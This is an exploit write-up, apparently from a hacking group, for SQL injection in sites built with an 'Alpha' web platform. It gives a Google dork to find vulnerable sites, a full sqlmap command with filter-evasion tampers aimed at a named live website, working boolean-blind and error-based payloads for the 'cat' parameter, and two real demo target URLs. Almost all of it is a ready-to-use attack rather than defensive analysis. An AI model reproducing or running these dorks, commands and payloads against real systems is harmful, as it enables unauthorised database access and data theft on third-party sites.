#################################################################################
# Exploit Title: By Alpha Sql İnjection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"created by alpha" inurl:php?cat
# Tested on : Kali Linux 2018.1
# Date : 12.03.2018
# Vendor Home: http://www.alpha.net.gr/data/home.php
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Sqlmap Or Manuel, Jsql, Themole, Sqlsus
[+] Sql GET Parameter "cat" İs Vulnerable
[+] The Back-End DBMS is MySQL >= 5.1
[+] 302 Redirect To N (no)
Command:root@TrazeR:~#
sqlmap --timeout=10 --threads=10 --time-sec=2 --random-agent --level=5 --risk=3 --ignore-proxy --hex --tamper=space2comment,between -u "http://www.thomasboats.gr/data/home.php?cat=950" --dbs
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=950' AND 2463=2463 AND 'EkSL' LIKE 'EkSL
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: cat=950' AND EXTRACTVALUE(7100,CONCAT(0x5c,0x717a6a7871,(SELECT (ELT(7100=7100,1))),0x717a626271)) AND 'YxZj' LIKE 'YxZj
Demo Sql:
http://www.thomasboats.gr/data/home.php?cat=950
http://salko.alpha.net.gr/data/home.php?cat=1083
Greet'Zzz :TrazeR & Zer0day & Göcebe & Kutluhan & R4PTOR